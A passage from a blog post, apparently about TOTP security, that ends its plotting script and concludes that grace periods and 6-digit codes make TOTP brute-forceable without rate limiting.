        range: { min: 0, max: 8 },
        step: 1
    });

    noUiSlider.create(DSlider, {
        start: [6],
        range: { min: 4, max: 8 },
        step: 1
    });

    vSlider.noUiSlider.on('update', function(values) {
        v = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    LSlider.noUiSlider.on('update', function(values) {
        L = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    lambdaSlider.noUiSlider.on('update', function(values) {
        lambda = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    DSlider.noUiSlider.on('update', function(values) {
        D = Math.round(values[0]);
        updateLabels();
        updatePlot();
    });

    updateLabels();
    updatePlot();
});

</script>

<p>So what conclusions can we draw from this mathematical venture of ours?</p>

<p>To my own personal dismay, the time step duration seems to carry very little weight. This unfortunately means that the simplified binomial model employed by other authors is almost indistinguishable from the one we developed in this article. In other words, our careful analysis turned out to be little more than computationally expensive pedantry. Well, at least now we know.</p>

<p>Unsurprisingly, the grace period parameter \(\lambda\) makes quite a significant difference to TOTP bruteforceability. It is my opinion that \(\lambda\) should generally be set to \(0\) in production systems: a non-zero grace period considerably weakens the security of TOTP authentication, and the synchronization issues it is meant to address are presumably quite rare – unless the prover submits their code at the very last second, which I’d wager most users instinctively avoid anyway.</p>

<p>As we’d suspected, 6-digit TOTPs are indeed troublingly bruteforceable; a ~50% chance of success can be obtained in a matter of hours with even a modest request rate of 20-30 requests per second. And with specialized software like <a href="https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack">Turbo Intruder</a>, much higher rates can often be achieved.</p>

<p>Hopefully, these results are enough to convince any lingering skeptics that TOTP systems should always be accompanied by robust rate-limiting protections.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry></feed>